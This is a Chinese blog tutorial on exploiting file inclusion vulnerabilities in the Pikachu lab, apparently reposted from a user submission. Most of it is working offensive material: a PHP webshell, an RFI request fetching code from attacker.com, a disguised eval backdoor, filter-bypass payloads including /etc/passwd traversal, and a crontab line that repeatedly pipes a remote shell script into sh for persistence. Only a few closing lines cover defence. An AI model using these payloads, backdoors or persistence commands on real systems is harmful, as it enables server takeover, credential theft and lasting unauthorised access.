Pikachu文件包含漏洞的花式玩法:从源码读取到蚁剑GetShell全记录
Pikachu文件包含漏洞的深度利用从源码审计到权限维持实战在网络安全领域文件包含漏洞一直是渗透测试中的黄金门票。不同于简单的SQL注入或XSS攻击文件包含漏洞往往能带来更直接的服务器控制权。本文将带你深入Pikachu靶场探索文件包含漏洞的高级利用技巧包括源码读取、路径爆破和权限维持等实战操作。1. 本地文件包含漏洞的深度利用本地文件包含(LFI)漏洞的核心在于应用程序未对用户输入的文件路径进行严格过滤。在Pikachu靶场中这个漏洞表现得尤为典型。首先我们观察靶场界面一个看似简单的文件选择下拉框背后隐藏着危险。通过Burp Suite拦截请求你会发现类似这样的参数GET /pikachu/vul/fi/fi_local.php?filenamefile1.php HTTP/1.1关键突破点在于参数值的可预测性。我们可以使用Burp Intruder进行自动化探测将请求发送到Intruder模块设置攻击类型为Sniper在filename参数处设置攻击载荷配置数字序列载荷(1-50步长1)攻击完成后筛选响应长度异常的请求往往会发现一些隐藏的敏感文件。例如file5.php可能包含数据库凭据?php $db_user root; $db_pass pssw0rd; //...注意实际渗透中除了数字序列还应尝试常见文件名如config.php、db_conn.php等2. 远程文件包含与WebShell部署远程文件包含(RFI)的危害性更大它允许攻击者从外部服务器包含恶意代码。在Pikachu环境中我们可以这样利用首先准备一个简单的PHP WebShell?php system($_GET[cmd]); ?然后通过RFI漏洞包含这个文件GET /pikachu/vul/fi/fi_remote.php?filenamehttp://attacker.com/shell.txt HTTP/1.1成功包含后使用蚁剑等工具连接右键添加数据URL填写WebShell路径密码留空根据实际WebShell设置测试连接并添加连接成功后你将获得完整的服务器文件系统访问权限可以执行命令、上传下载文件等。3. 源码读取技巧进阶除了常规文件包含PHP的php://filter协议可以让我们读取PHP文件源码而不执行它。这在审计和漏洞挖掘中极为有用。使用Burp Repeater修改请求GET /pikachu/vul/fi/fi_remote.php?filenamephp://filter/convert.base64-encode/resourcefi_remote.php HTTP/1.1服务器会返回Base64编码的源码解码后即可获得原始PHP代码。这种方法可以用于分析应用程序逻辑寻找其他漏洞如硬编码凭证理解防御机制以绕过下表比较了不同文件包含利用方式的优缺点利用方式所需条件获取内容隐蔽性直接LFI文件存在执行结果低RFI允许远程包含任意代码中php://filter无特殊要求源码文本高4. 权限维持与防御绕过获得初始访问权限后如何维持访问是关键。除了常规的WebShell还可以考虑隐蔽后门技术?php $page $_GET[p]; if($page stats) { // 看起来像正常页面 include(legit_stats.php); } else { // 隐藏后门 eval($_POST[cmd]); } ?防御绕过技巧路径遍历尝试....//....//etc/passwd空字节截断evil.jpg%00.php大小写混淆pHp://FilTer协议嵌套zip://archive.zip#shell.php在实际渗透中这些技术往往需要组合使用。例如GET /vuln.php?fileZIP://malicious.zip%23shell.txt HTTP/1.15. 实战中的综合应用让我们看一个完整的攻击链示例通过LFI发现/var/www/html/config.php包含数据库凭据使用凭据登录数据库发现管理员密码哈希破解哈希后登录后台找到文件上传点上传伪装成图片的WebShell通过LFI执行上传的WebShell建立持久化后门关键命令记录# 查找可写目录 find / -type d -perm -ow 2/dev/null # 添加计划任务维持访问 (crontab -l ; echo * * * * * curl http://attacker.com/shell.sh | sh) | crontab -防御方面开发者应该禁用allow_url_include使用白名单限制包含文件对用户输入严格过滤定期更新和修补系统文件包含漏洞的利用远不止这些基础技巧在实际渗透中需要根据目标环境灵活调整策略。掌握这些技术不仅能帮助你更好地理解Web安全也能提升你的防御能力。
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2459543.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!